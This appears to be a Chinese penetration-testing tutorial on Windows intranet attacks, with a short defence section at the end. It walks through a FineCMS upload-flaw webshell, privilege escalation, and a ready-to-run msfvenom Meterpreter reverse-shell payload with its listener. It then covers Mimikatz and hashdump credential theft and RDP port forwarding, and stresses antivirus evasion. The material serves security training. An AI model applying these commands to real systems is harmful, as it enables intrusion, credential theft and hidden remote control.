web渗透---windows内网渗透
字数 938 2025-08-09 22:00:49
Windows内网渗透技术详解
一、内网渗透基本思路
内网渗透主要有两种攻击路径:
-
外网服务器跳板攻击:
- 通过攻击外网服务器获取权限
- 利用外网服务器作为跳板攻击内网其他服务器
- 获取敏感数据(如系统密码)
- 视情况安装后门实现长期控制
-
办公网渗透攻击:
- 通过社工攻击企业办公电脑或无线网络
- 获取办公网数据
- 利用办公电脑作为内网渗透入口
二、渗透测试流程详解
1. Web渗透阶段
目标系统:FineCMS v5建站系统
攻击步骤:
- 注册新用户账号
- 利用会员头像上传功能漏洞:
- 原始文件格式:0x0.png
- 使用Burp Suite拦截修改Content-Type为image/php
- 上传一句话木马:
- 验证参数:
v=phpinfo();
- 验证参数:
- 使用中国菜刀连接:
- 输入木马路径和密码参数
- 获取Webshell权限
2. 权限提升阶段
在菜刀中可尝试的提权方法:
- MOF提权:利用Windows管理对象格式文件
- UDF提权:通过用户自定义函数
- 启动项提权:添加恶意启动项
3. 反弹Shell获取
-
生成免杀木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe > /root/Desktop/su.exe -
通过菜刀上传su.exe到目标服务器
-
配置Metasploit监听:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.10.130 run -
在菜刀虚拟终端执行su.exe触发反弹
4. 凭证获取技术
获取系统密码的方法:
- 使用
hashdump获取密码哈希 - 加载Mimikatz模块:
load mimikatz kerberos - 分析获取的Kerberos票据
三、远程桌面控制技术
方法一:Meterpreter端口转发
- 执行端口转发:
portfwd add -l 5555 -p 3389 -r 目标IP - 本地连接:
rdesktop -u 用户名 -p 密码 127.0.0.1:5555
方法二:LCX工具端口转发
- 靶机执行(将3389转发到攻击机5555端口):
lcx.exe -slave 攻击机IP 5555 目标IP 3389 - 攻击机监听:
lcx.exe -listen 5555 33891 - 连接本地转发端口:
mstsc连接127.0.0.1:33891
四、关键注意事项
- 当目标服务器设置为"不允许连接到这台计算机"时,单纯端口转发无效
- 免杀技术至关重要,避免被安全软件检测
- 内网渗透需考虑不同系统的特有漏洞:
- 操作系统版本漏洞
- 中间件漏洞
- 组件漏洞
- 端口服务漏洞
五、防御建议
- 及时更新CMS系统和组件补丁
- 严格限制文件上传类型和内容检查
- 禁用不必要的系统服务
- 配置严格的远程访问策略
- 部署终端检测与响应(EDR)系统
- 定期审计系统日志和异常连接
通过以上技术流程,攻击者可以完成从外网渗透到内网横向移动的全过程,安全团队应针对每个环节部署相应的防御措施。